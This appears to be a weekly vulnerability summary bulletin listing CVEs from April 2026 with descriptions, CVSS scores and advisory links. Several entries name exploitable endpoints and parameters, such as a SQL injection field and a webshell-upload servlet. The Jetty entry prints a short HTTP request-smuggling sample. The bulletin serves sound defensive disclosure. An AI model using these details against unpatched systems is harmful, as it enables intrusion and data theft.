| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 12.4 before 18.9.6, 18.10 before 18.10.4, and 18.11 before 18.11.1 that could have allowed an authenticated user to cause denial of service by overwhelming system resources under certain conditions due to insufficient resource allocation limits in the GraphQL API. | 2026-04-22 | 6.5 | CVE-2025-3922 | HackerOne Bug Bounty Report #3098035 https://gitlab.com/gitlab-org/gitlab/-/work_items/537422 https://about.gitlab.com/releases/2026/04/22/patch-release-gitlab-18-11-1-released/ |
| Picajet--RoboImport | RoboImport 1.2.0.72 contains a denial of service vulnerability that allows local attackers to crash the application by submitting oversized input to registration fields. Attackers can paste a 6000-byte buffer into the Registration Name and Registration Key fields and click Register to trigger an application crash. | 2026-04-26 | 5.5 | CVE-2018-25276 | ExploitDB-45382 Product Reference VulnCheck Advisory: RoboImport 1.2.0.72 Denial of Service via Registration Fields |
| Infiltration-Systems--Infiltrator Network Security Scanner | Infiltrator Network Security Scanner 4.6 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an oversized input string. Attackers can paste a 6000-byte payload into the Scan Target field and trigger a denial of service condition when the Scan button is clicked. | 2026-04-26 | 5.5 | CVE-2018-25280 | ExploitDB-45390 Product Reference VulnCheck Advisory: Infiltrator Network Security Scanner 4.6 Denial of Service |
| Maxprog--iCash | iCash 7.6.5 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an oversized payload through the Connect to Server dialog. Attackers can paste a 7000-byte string into the Host field and click Connect to trigger an application crash. | 2026-04-26 | 5.5 | CVE-2018-25281 | ExploitDB-45388 VulnCheck Advisory: iCash 7.6.5 Denial of Service via Connect to Server |
| Fathom--Fathom | Fathom 2.4 contains a buffer overflow vulnerability in the Authorization Code field that allows local attackers to crash the application by submitting an oversized input string. Attackers can paste a 6000-byte payload into the Authorization Code field and click Activate to trigger a denial of service condition. | 2026-04-26 | 5.5 | CVE-2018-25285 | ExploitDB-45294 Official Product Homepage Product Reference VulnCheck Advisory: Fathom 2.4 Denial of Service via Authorization Code Buffer Overflow |
| Hdtune--Drive Power Manager | Drive Power Manager 1.10 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an excessively long string in the Name field. Attackers can paste a 6000-byte payload into the Name field and click Register to trigger a denial of service condition. | 2026-04-26 | 5.5 | CVE-2018-25287 | ExploitDB-45299 Official Product Homepage VulnCheck Advisory: Drive Power Manager 1.10 Denial of Service via Name Field |
| P10--Central Management Software | P10 Central Management Software 1.4.13 contains a buffer overflow vulnerability in the login password field that allows local attackers to crash the application by submitting an oversized input string. Attackers can paste a 2000-byte payload into the password field and click login to trigger an application crash and denial of service. | 2026-04-26 | 5.5 | CVE-2018-25296 | ExploitDB-45207 Official Product Homepage VulnCheck Advisory: P10 Central Management Software 1.4.13 Denial of Service |
| Fortra--GoAnywhere MFT | Encrypted values in Fortra's GoAnywhere MFT prior to version 7.10.0 and GoAnywhere Agents prior to version 2.2.0 utilize a static IV which allows admin users to brute-force decryption of data. | 2026-04-21 | 5.8 | CVE-2025-1241 | https://fortra.com/security/advisories/product-security/FI-2026-001 |
| OpenSC--OpenSC | Multiple uses of uninitialized variables were found in libopensc that may lead to information disclosure or application crash. An attack requires a crafted USB device or smart card that would present the system with specially crafted responses to the APDUs | 2026-04-23 | 5.7 | CVE-2025-13763 | https://access.redhat.com/security/cve/CVE-2025-13763 RHBZ#2417581 https://github.com/OpenSC/OpenSC/security/advisories/GHSA-2v44-fq35-98vv https://github.com/OpenSC/OpenSC/wiki/CVE-2025-13763 |
| HCLSoftware--BigFix Service Management (SM) | HCL BigFix Service Management (SM) Discovery is vulnerable to unenforced encryption due to port 80 (HTTP) being open, allowing unencrypted access. An attacker with access to the network traffic can sniff packets from the connection and uncover the data. | 2026-04-21 | 5.3 | CVE-2025-31981 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127605 |
| IBM--Security Verify Directory (Container) | IBM Security Verify Directory (Container) 10.0.0 through 10.0.0.3 IBM Security Verify Directory could be vulnerable to malicious file upload by not validating file type. A privileged user could upload malicious files into the system that can be sent to victims for performing further attacks against the system. | 2026-04-22 | 5.5 | CVE-2025-36074 | https://www.ibm.com/support/pages/node/7268907 |
| hubspotdev--HubSpot All-In-One Marketing Forms, Popups, Live Chat | The HubSpot All-In-One Marketing - Forms, Popups, Live Chat plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 11.3.32 via the leadin/public/admin/class-adminconstants.php file. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract a list of all installed plugins and their versions which can be leveraged for reconnaissance and further attacks. | 2026-04-24 | 4.3 | CVE-2025-11762 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2a8c62e6-f459-433a-b0c4-c79285ea7fe9?source=cve https://research.cleantalk.org/CVE-2025-11762 https://plugins.trac.wordpress.org/browser/leadin/tags/11.3.33/public/admin/class-adminconstants.php |
Low Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| HCLSoftware--BigFix Service Management (SM) | HCL BigFix Service Management is susceptible to HTTP Request Smuggling. HTTP request smuggling vulnerabilities arise when websites route HTTP requests through web servers with inconsistent HTTP parsing. HTTP Smuggling exploits inconsistencies in request parsing between front-end and back-end servers, allowing attackers to bypass security controls and perform attacks like cache poisoning or request hijacking. | 2026-04-21 | 3.7 | CVE-2025-31958 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124209 |
Severity Not Yet Assigned
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| NWCLARK--Storable | Storable versions before 3.05 for Perl has a stack overflow. The retrieve_hook function stored the length of the class name into a signed integer but in read operations treated the length as unsigned. This allowed an attacker to craft data that could trigger the overflow. | 2026-04-21 | not yet calculated | CVE-2017-20230 | https://github.com/Perl/perl5/issues/15831 https://github.com/Perl/perl5/commit/a258c17c6937f79529c8319a829310e09cdbd216.patch https://metacpan.org/release/RURBAN/Storable-3.05/changes https://www.nntp.perl.org/group/perl.perl5.porters/2017/01/msg242533.html https://www.nntp.perl.org/group/perl.perl5.porters/2017/01/msg242703.html |
| Seeyon Internet Software--A8-V5 Collaborative Management Software | Seeyon OA A8 contains an unauthenticated arbitrary file write vulnerability in the /seeyon/htmlofficeservlet endpoint that allows remote attackers to write arbitrary files to the web application root by sending specially crafted POST requests with custom base64-encoded payloads. Attackers can write JSP webshells to the web root and execute them through the web server to achieve arbitrary OS command execution with web server privileges. Exploitation evidence was first observed by the Shadowserver Foundation on 2021-03-26 (UTC). | 2026-04-21 | not yet calculated | CVE-2019-25714 | https://sourceforge.net/software/product/A8/ https://web.archive.org/web/20190821034711/http://wyb0.com/posts/2019/seeyon-htmlofficeservlet-getshell/ https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/%E8%87%B4%E8%BF%9Coa/%E8%87%B4%E8%BF%9C%20OA%20A8%20htmlofficeservlet%20getshell%20%E6%BC%8F%E6%B4%9E/ https://static-aliyun-doc.oss-cn-hangzhou.aliyuncs.com/download/pdf/90916/Security_Notification_reseller_en-US.pdf https://www.broadcom.com/support/security-center/attacksignatures/detail?asid=31713 https://www.fortiguard.com/encyclopedia/ips/48874/seeyon-office-anywhere-htmlofficeservlet-arbitrary-file-upload https://www.vulncheck.com/advisories/seeyon-office-anywhere-oa-a8-unauthenticated-arbitrary-file-write-via-htmlofficeservlet |
| Unknown--Email Encoder | The Email Encoder WordPress plugin before 2.3.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2026-04-20 | not yet calculated | CVE-2024-7083 | https://wpscan.com/vulnerability/7aeb6891-e159-4ed8-b1a9-a551140c9fcc/ |
| Semantic MediaWiki--Semantic MediaWiki | Cross-Site Scripting (XSS) vulnerability reflected in Semantic MediaWiki. This vulnerability allows an attacker to execute JavaScript code in the victim's browser by sending them a malicious URL using the '/index.php/Speciaal:GefacetteerdZoeken' endpoint parameter. This vulnerability can be exploited to steal sensitive user data, such as session cookies, or to perform actions on behalf of the user. | 2026-04-21 | not yet calculated | CVE-2025-10354 | https://www.incibe.es/en/incibe-cert/notices/aviso/reflected-cross-site-scripting-xss-semantic-mediawiki |
| EfficientLab, LLC--Controlio | EfficientLab Controlio before v1.3.95 contains a DLL hijacking vulnerability caused by weak folder permissions in the installation directory. A local attacker can place a specially crafted DLL in this directory and achieve arbitrary code execution with highest privileges, because the affected service runs as NT AUTHORITY\SYSTEM. | 2026-04-23 | not yet calculated | CVE-2025-10549 | https://r.sec-consult.com/controlio https://kb.controlio.net/hc/en-us/articles/45777908471185-Client-Update-April-15-2026-ver-1-3-95 |
| Fudo Security--Fudo Enterprise | Fudo Enterprise in versions from 5.5.0 through 5.6.2 allows low privileged users to access certain administrator-only resources via improperly protected API endpoints. This includes sensitive information such as system logs and parts of system configuration settings. This vulnerability has been fixed in version 5.6.3 | 2026-04-20 | not yet calculated | CVE-2025-13480 | https://www.fudosecurity.com/product/enterprise https://cert.pl/en/posts/2026/04/CVE-2025-13480 https://download.fudosecurity.com/documentation/fudo/5_6/rn/RN_5.6.3.pdf |
| Zervit--portable HTTP/Web server | Zervit's portable HTTP/web server is vulnerable to remote DoS attacks when a configuration reset request is made. The vulnerability is caused by inadequate validation of user-supplied input. An attacker can exploit this vulnerability by sending malicious requests. If the vulnerability is successfully exploited, the application can be made to stop responding, resulting in a DoS condition. It is possible to manually restart the application. | 2026-04-21 | not yet calculated | CVE-2025-13826 | https://www.incibe.es/en/incibe-cert/notices/aviso/incorrect-input-validation-zervit-portable-httpweb-server |
| ATRODO--Net:Dropbear | Net:Dropbear versions before 0.14 for Perl contains a vulnerable version of libtomcrypt. Net:Dropbear versions before 0.14 includes versions of Dropbear 2019.78 or earlier. These include versions of libtomcrypt v1.18.1 or earlier, which is affected by CVE-2016-6129 and CVE-2018-12437. | 2026-04-21 | not yet calculated | CVE-2025-15638 | https://www.cve.org/CVERecord?id=CVE-2016-6129 https://www.cve.org/CVERecord?id=CVE-2018-12437 https://metacpan.org/release/ATRODO/Net-Dropbear-0.14/source/dropbear/libtomcrypt/changes |
| PHP Point Of Sale--PHP Point Of Sale | HTML injection vulnerability in PHP Point of Sale v19.4. This vulnerability allows an attacker to render HTML in the victim's browser due to a lack of proper validation of user input by sending a request to '/reports/generate/specific_customer', ussing 'start_date_formatted' y 'end_date_formatted' parameters. | 2026-04-21 | not yet calculated | CVE-2025-41011 | https://www.incibe.es/en/incibe-cert/notices/aviso/html-injection-php-point-sale-0 |
| Zeon Global Tech--Zeon Academy Pro | SQL injection vulnerability in Zeon Academy Pro by Zeon Global Tech. This vulnerability allows an attacker to retrieve, create, update, and delete databases by sending a POST request using the parameter 'phonenumber' in '/private/continue-upload.php'. | 2026-04-21 | not yet calculated | CVE-2025-41029 | https://www.incibe.es/en/incibe-cert/notices/aviso/sql-injection-zeon-academy-pro-zeon-global-tech |
Vulnerability Summary for the Week of April 13, 2026
Posted on Tuesday April 21, 2026
High Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Grafana--Pyroscope | Pyroscope is an open-source continuous profiling database. The database supports various storage backends, including Tencent Cloud Object Storage (COS). If the database is configured to use Tencent COS as the storage backend, an attacker could extract the secret_key configuration value from the Pyroscope API. To exploit this vulnerability, an attacker needs direct access to the Pyroscope API. We highly recommend limiting the public internet exposure of all our databases, such that they are only accessible by trusted users or internal systems. This vulnerability is fixed in versions: 1.15.x: 1.15.2 and above. 1.16.x: 1.16.1 and above. 1.17.x: 1.17.0 and above (i.e. all versions). Thanks to Théo Cusnir for reporting this vulnerability to us via our bug bounty program. | 2026-04-15 | 9.1 | CVE-2025-41118 | https://grafana.com/security/security-advisories/cve-2025-41118 |
| n/a--Grocery Store Management System v1.0 | Improper input handling in /Grocery/search_products_itname.php, in anirudhkannan Grocery Store Management System 1.0, allows SQL injection via the sitem_name POST parameter. | 2026-04-14 | 9.8 | CVE-2025-63939 | https://github.com/TREXNEGRO/Security-Advisories/tree/main/CVE-2025-63939 |
| n/a--manikandan580 School-management-system v1.0 | In manikandan580 School-management-system 1.0, a time-based blind SQL injection vulnerability exists in /studentms/admin/between-date-reprtsdetails.php through the fromdate POST parameter. | 2026-04-14 | 9.8 | CVE-2025-65135 | https://github.com/TREXNEGRO/Security-Advisories/tree/main/CVE-2025-65135 |
| Owen--WebStack | The WebStack theme for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the io_img_upload() function in all versions up to, and including, 1.2024. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2026-04-15 | 9.8 | CVE-2026-1555 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b97805de-1b47-4c9f-baae-2e37c1b78570?source=cve https://github.com/owen0o0/WebStack/blob/master/inc/ajax.php#L5 https://github.com/owen0o0/WebStack/tree/master |
| Cisco--Cisco Identity Services Engine Software | A vulnerability in Cisco ISE and Cisco ISE-PIC could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system of an affected device. To exploit this vulnerability, the attacker must have valid administrative credentials. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to obtain user-level access to the underlying operating system and then elevate privileges to root. In single-node ISE deployments, successful exploitation of this vulnerability could cause the affected ISE node to become unavailable, resulting in a denial of service (DoS) condition. In that condition, endpoints that have not already authenticated would be unable to access the network until the node is restored. | 2026-04-15 | 9.9 | CVE-2026-20147 | cisco-sa-ise-rce-traversal-8bYndVrZ |
| Cisco--Cisco Identity Services Engine Software | A vulnerability in Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system of an affected device. To exploit this vulnerability, the attacker must have at least Read Only Admin credentials. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to obtain user-level access to the underlying operating system and then elevate privileges to root. In single-node ISE deployments, successful exploitation of these vulnerabilities could cause the affected ISE node to become unavailable, resulting in a denial of service (DoS) condition. In that condition, endpoints that have not already authenticated would be unable to access the network until the node is restored. | 2026-04-15 | 9.9 | CVE-2026-20180 | cisco-sa-ise-rce-4fverepv |
| Cisco--Cisco Webex Meetings | A vulnerability in the integration of single sign-on (SSO) with Control Hub in Cisco Webex Services could have allowed an unauthenticated, remote attacker to impersonate any user within the service. This vulnerability existed because of improper certificate validation. Prior to this vulnerability being addressed, an attacker could have exploited this vulnerability by connecting to a service endpoint and supplying a crafted token. A successful exploit could have allowed the attacker to gain unauthorized access to legitimate Cisco Webex services. | 2026-04-15 | 9.8 | CVE-2026-20184 | cisco-sa-webex-cui-cert-8jSZYhWL |
| Cisco--Cisco Identity Services Engine Software | A vulnerability in Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system of an affected device. To exploit this vulnerability, the attacker must have at least Read Only Admin credentials. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to obtain user-level access to the underlying operating system and then elevate privileges to root. In single-node ISE deployments, successful exploitation of these vulnerabilities could cause the affected ISE node to become unavailable, resulting in a denial of service (DoS) condition. In that condition, endpoints that have not already authenticated would be unable to access the network until the node is restored. | 2026-04-15 | 9.9 | CVE-2026-20186 | cisco-sa-ise-rce-4fverepv |
| Ubiquiti Inc--UniFi Play PowerAmp | A malicious actor with access to the UniFi Play network could exploit a Path Traversal vulnerability found in the device firmware to write files on the system that could be used for a remote code execution (RCE). Affected Products: UniFi Play PowerAmp (Version 1.0.35 and earlier) UniFi Play Audio Port (Version 1.0.24 and earlier) Mitigation: Update UniFi Play PowerAmp to Version 1.0.38 or later Update UniFi Play Audio Port to Version 1.1.9 or later | 2026-04-13 | 9.8 | CVE-2026-22562 | https://community.ui.com/releases/Security-Advisory-Bulletin-063/e468dd4b-5090-4ef8-89d8-939903c08e83 |
| Ubiquiti Inc--UniFi Play PowerAmp | A series of Improper Input Validation vulnerabilities could allow a Command Injection by a malicious actor with access to the UniFi Play network. Affected Products: UniFi Play PowerAmp (Version 1.0.35 and earlier) UniFi Play Audio Port (Version 1.0.24 and earlier) Mitigation: Update UniFi Play PowerAmp to Version 1.0.38 or later Update UniFi Play Audio Port to Version 1.1.9 or later | 2026-04-13 | 9.8 | CVE-2026-22563 | https://community.ui.com/releases/Security-Advisory-Bulletin-063/e468dd4b-5090-4ef8-89d8-939903c08e83 |
| Ubiquiti Inc--UniFi Play PowerAmp | An Improper Access Control vulnerability could allow a malicious actor with access to the UniFi Play network to enable SSH to make unauthorized changes to the system. Affected Products: UniFi Play PowerAmp (Version 1.0.35 and earlier) UniFi Play Audio Port (Version 1.0.24 and earlier) Mitigation: Update UniFi Play PowerAmp to Version 1.0.38 or later Update UniFi Play Audio Port to Version 1.1.9 or later | 2026-04-13 | 9.8 | CVE-2026-22564 | https://community.ui.com/releases/Security-Advisory-Bulletin-063/e468dd4b-5090-4ef8-89d8-939903c08e83 |
| Festo--MSE6-C2M-5000-FB36-D-M-RG-BAR-M12L4-AGD | In products of the MSE6 product-family by Festo a remote authenticated, low privileged attacker could use functions of undocumented test mode which could lead to a complete loss of confidentiality, integrity and availability. | 2026-04-16 | 8.8 | CVE-2023-3634 | https://certvde.com/de/advisories/VDE-2023-020/ https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2023/fsa-202304.json |
| shahinurislam--Career Section | The Career Section plugin for WordPress is vulnerable to Cross-Site Request Forgery leading to Path Traversal and Arbitrary File Deletion in all versions up to, and including, 1.6. This is due to missing nonce validation and insufficient file path validation on the delete action in the 'appform_options_page_html' function. This makes it possible for unauthenticated attackers to delete arbitrary files on the server via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-04-16 | 8.8 | CVE-2025-14868 | https://www.wordfence.com/threat-intel/vulnerabilities/id/84936b68-923a-4da1-ae67-1d63d025342e?source=cve https://plugins.trac.wordpress.org/changeset/3474216/career-section |
| Nozomi Networks--Guardian | An access control vulnerability was discovered in the Threat Intelligence functionality due to a specific access restriction not being properly enforced for users with view-only privileges. An authenticated user with view-only privileges for the Threat Intelligence functionality can perform administrative actions on it, altering the rules configuration, and/or affecting their availability. | 2026-04-15 | 8.1 | CVE-2025-40897 | https://security.nozominetworks.com/NN-2026:1-01 |
| Nozomi Networks--Guardian | A Stored Cross-Site Scripting vulnerability was discovered in the Assets and Nodes functionality due to improper validation of an input parameter. An authenticated user with custom fields privileges can define a malicious custom field containing a JavaScript payload. When the victim views the Assets or Nodes pages, the XSS executes in their browser context, allowing the attacker to perform unauthorized actions as the victim, such as modify application data, disrupt application availability, and access limited sensitive information. | 2026-04-15 | 8.9 | CVE-2025-40899 | https://security.nozominetworks.com/NN-2026:2-01 |
| livemesh--Livemesh Addons by Elementor | The Livemesh Addons for Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 9.0. This is due to insufficient sanitization of the template name parameter in the `lae_get_template_part()` function, which uses an inadequate `str_replace()` approach that can be bypassed using recursive directory traversal patterns. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the attacker to include and execute local files via the widget's template parameter granted they can trick an administrator into performing an action or install Elementor. | 2026-04-16 | 8.8 | CVE-2026-1620 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2483875a-84de-4a40-a69e-aee68da1ce3b?source=cve https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/includes/helper-functions.php#L669 https://plugins.trac.wordpress.org/browser/addons-for-elementor/tags/9.0/includes/helper-functions.php#L669 https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/includes/helper-functions.php#L671 https://plugins.trac.wordpress.org/browser/addons-for-elementor/tags/9.0/includes/helper-functions.php#L671 |
| Cloud Foundry--UUA | Cloud Foundry UUA is vulnerable to a bypass that allows an attacker to obtain a token for any user and gain access to UAA-protected systems. This vulnerability exists when SAML 2.0 bearer assertions are enabled for a client, as the UAA accepts SAML 2.0 bearer assertions that are neither signed nor encrypted. This issue affects UUA from v77.30.0 to v78.7.0 (inclusive) and it affects CF Deployment from v48.7.0 to v54.14.0 (inclusive). | 2026-04-16 | 8.6 | CVE-2026-22734 | https://www.cloudfoundry.org/blog/cve-2026-22734-uaa-saml-2-0-signature-bypass/ |
| WSO2--WSO2 API Manager | The XML parsers within multiple WSO2 products accept user-supplied XML data without properly configuring to prevent the resolution of external entities. This omission allows malicious actors to craft XML payloads that exploit the parser's behavior, leading to the inclusion of external resources. By leveraging this vulnerability, an attacker can read confidential files from the file system and access limited HTTP resources reachable by the product. Additionally, the vulnerability can be exploited to perform denial of service attacks by exhausting server resources through recursive entity expansion or fetching large external resources. | 2026-04-16 | 7.5 | CVE-2024-2374 | https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2024-3255/ |
| Bosch--BVMS | Uncontrolled Resource Consumption in Bosch VMS Central Server in Bosch VMS 12.0.1 allows attackers to consume excessive amounts of disk space via network interface. | 2026-04-15 | 7.5 | CVE-2024-33618 | https://psirt.bosch.com/security-advisories/BOSCH-SA-162032-BT.html |
| Dell--PowerProtect Data Domain BoostFS | Dell PowerProtect Data Domain BoostFS for client of Feature Release versions 7.7.1.0 through 8.5, LTS2025 release version 8.3.1.0 through 8.3.1.20, LTS2024 release versions 7.13.1.0 through 7.13.1.50, contain an insufficiently protected credentials vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to credential exposure. The attacker may be able to use the exposed credentials to access the system with privileges of the compromised account. | 2026-04-17 | 7.8 | CVE-2025-36568 | https://www.dell.com/support/kbdoc/en-us/000450699/dsa-2026-060-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities |
| WC Lovers--WCFM Marketplace | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WC Lovers WCFM Marketplace allows SQL Injection.This issue affects WCFM Marketplace: from n/a through 3.7.1. | 2026-04-15 | 7.6 | CVE-2025-63029 | https://patchstack.com/database/wordpress/plugin/wc-multivendor-marketplace/vulnerability/wordpress-wcfm-marketplace-plugin-3-7-1-sql-injection-vulnerability?_s_id=cve |
| FirebirdSQL--firebird | Firebird is an open-source relational database management system. In versions FB3 of the client library placed incorrect data length values into XSQLDA fields when communicating with FB4 or higher servers, resulting in an information leak. This issue is fixed by upgrading to the FB4 client or higher. | 2026-04-17 | 7.9 | CVE-2025-65104 | https://github.com/FirebirdSQL/firebird/security/advisories/GHSA-mfpr-9886-xjhg https://github.com/FirebirdSQL/firebird/releases/tag/v4.0.0 |
| Lenovo--Diagnostics | During an internal security assessment, a potential vulnerability was discovered in Lenovo Diagnostics and the HardwareScanAddin used in Lenovo Vantage that, during installation or when using hardware scan, could allow a local authenticated user to perform an arbitrary file write with elevated privileges. | 2026-04-15 | 7.1 | CVE-2026-0827 | https://support.lenovo.com/us/en/product_security/LEN-210693 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.2.1, 10.0.5, 9.4.10, and 9.3.11, and Splunk Cloud Platform versions below 10.4.2603.0, 10.3.2512.5, 10.2.2510.9, 10.1.2507.19, 10.0.2503.13, and 9.3.2411.127, a low-privileged user that does not hold the `admin` or `power` Splunk roles could potentially perform a Remote Code Execution (RCE) by uploading a malicious file to the `$SPLUNK_HOME/var/run/splunk/apptemp` directory due to improper handling and insufficient isolation of temporary files within the `apptemp` directory. | 2026-04-15 | 7.1 | CVE-2026-20204 | https://advisory.splunk.com/advisories/SVD-2026-0403 |
| Splunk--Splunk MCP Server | In Splunk MCP Server app versions below 1.0.3 , a user who holds a role with access to the Splunk `_internal` index or possesses the high-privilege capability `mcp_tool_admin` could view users session and authorization tokens in clear text.<br><br>The vulnerability would require either local access to the log files or administrative access to internal indexes, which by default only the admin role receives. <br><br>Review roles and capabilities on your instance and restrict internal index access to administrator-level roles. See [Define roles on the Splunk platform with capabilities](https://docs.splunk.com/Documentation/Splunk/latest/Security/Rolesandcapabilities) and [Connecting to MCP Server and Admin settings](https://help.splunk.com/en/splunk-enterprise/mcp-server-for-splunk-platform/connecting-to-mcp-server-and-admin-settings) in the Splunk documentation for more information. | 2026-04-15 | 7.2 | CVE-2026-20205 | https://advisory.splunk.com/advisories/SVD-2026-0407 |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Management Services allows an authorized attacker to elevate privileges locally. | 2026-04-14 | 7.8 | CVE-2026-20930 | Windows Management Services Elevation of Privilege Vulnerability |
| Ubiquiti Inc--UniFi Play PowerAmp | An Improper Access Control vulnerability could allow a malicious actor with access to the UniFi Play network to obtain UniFi Play WiFi credentials. Affected Products: UniFi Play PowerAmp (Version 1.0.35 and earlier) UniFi Play Audio Port (Version 1.0.24 and earlier) Mitigation: Update UniFi Play PowerAmp to Version 1.0.38 or later Update UniFi Play Audio Port to Version 1.1.9 or later | 2026-04-13 | 7.5 | CVE-2026-22566 | https://community.ui.com/releases/Security-Advisory-Bulletin-063/e468dd4b-5090-4ef8-89d8-939903c08e83 |
| Eaton--IPP software | Eaton Intelligent Power Protector (IPP) is affected by insecure library loading in its executable, which could lead to arbitrary code execution by an attacker with access to the software package. This security issue has been fixed in the latest version of Eaton IPP software which is available on the Eaton download center. | 2026-04-16 | 7.8 | CVE-2026-22619 | https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/etn-va-2025-1025.pdf |
| easyappointments--Easy Appointments | The Easy Appointments plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.12.21 via the `/wp-json/wp/v2/eablocks/ea_appointments/` REST API endpoint. This is due to the endpoint being registered with `'permission_callback' => '__return_true'`, which allows access without any authentication or authorization checks. This makes it possible for unauthenticated attackers to extract sensitive customer appointment data including full names, email addresses, phone numbers, IP addresses, appointment descriptions, and pricing information. | 2026-04-17 | 7.5 | CVE-2026-2262 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e681aa8e-522e-4092-aa1f-8ada3097c8d6?source=cve https://plugins.trac.wordpress.org/browser/easy-appointments/tags/3.12.19/ea-blocks/ea-blocks.php#L190 https://plugins.trac.wordpress.org/browser/easy-appointments/trunk/ea-blocks/ea-blocks.php#L190 https://plugins.trac.wordpress.org/browser/easy-appointments/tags/3.12.19/ea-blocks/ea-blocks.php#L141 https://plugins.trac.wordpress.org/changeset/3485692/easy-appointments/trunk/ea-blocks/ea-blocks.php https://plugins.trac.wordpress.org/changeset?old_path=%2Feasy-appointments/tags/3.12.21&new_path=%2Feasy-appointments/tags/3.12.22 |
| Barracuda Networks--RMM | Barracuda RMM versions prior to 2025.2.2 contain a privilege escalation vulnerability that allows local attackers to gain SYSTEM-level privileges by exploiting overly permissive filesystem ACLs on the C:\Windows\Automation directory. Attackers can modify existing automation content or place attacker-controlled files in this directory, which are then executed under the NT AUTHORITY\SYSTEM account during routine automation cycles, typically succeeding within the next execution cycle. | 2026-04-15 | 7.8 | CVE-2026-22676 | https://download.mw-rmm.barracudamsp.com/PDF/2025.2.2/RN_BRMM_2025.2.2_EN.pdf https://www.vulncheck.com/advisories/barracuda-rmm-privilege-escalation-via-insecure-directory-permissions |
| Fortinet--FortiAnalyzer Cloud | A heap-based buffer overflow vulnerability in Fortinet FortiAnalyzer Cloud 7.6.2 through 7.6.4, FortiManager Cloud 7.6.2 through 7.6.4 may allow a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests. Successful exploitation would require a large amount of effort in preparation because of ASLR and network segmentation | 2026-04-14 | 7.3 | CVE-2026-22828 | https://fortiguard.fortinet.com/psirt/FG-IR-26-121 |
| Eclipse Foundation--Eclipse Jetty | In Eclipse Jetty, the HTTP/1.1 parser is vulnerable to request smuggling when chunk extensions are used, similar to the "funky chunks" techniques outlined here: * https://w4ke.info/2025/06/18/funky-chunks.html * https://w4ke.info/2025/10/29/funky-chunks-2.html Jetty terminates chunk extension parsing at \r\n inside quoted strings instead of treating this as an error. POST / HTTP/1.1 Host: localhost Transfer-Encoding: chunked 1;ext="val X 0 GET /smuggled HTTP/1.1 ... Note how the chunk extension does not close the double quotes, and it is able to inject a smuggled request. | 2026-04-14 | 7.4 | CVE-2026-2332 | https://github.com/jetty/jetty.project/security/advisories/GHSA-355h-qmc2-wpwf https://gitlab.eclipse.org/security/cve-assignment/-/issues/89 |
Medium Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| WSO2--WSO2 API Manager | The authentication endpoint fails to adequately validate user-supplied input before reflecting it back in the response. This allows an attacker to inject malicious script payloads into the input parameters, which are then executed by the victim's browser. Successful exploitation can enable an attacker to redirect the user's browser to a malicious website, modify the UI of the web page, or retrieve information from the browser. However, the impact is limited as session-related sensitive cookies are protected by the httpOnly flag, preventing session hijacking. | 2026-04-16 | 6.1 | CVE-2024-10242 | https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2024-3741/ |
| WSO2--WSO2 Identity Server | Active access tokens are not revoked or invalidated when a user account is locked within WSO2 Identity Server. This failure to enforce revocation allows previously issued, valid tokens to remain usable, enabling continued access to protected resources by locked user accounts. The security consequence is that a locked user account can maintain access to protected resources through the use of existing, unexpired access tokens. This creates a security gap where access control policies are bypassed, potentially leading to unauthorized data access or actions until the tokens naturally expire. | 2026-04-16 | 6 | CVE-2025-12624 | https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2025-4684/ |
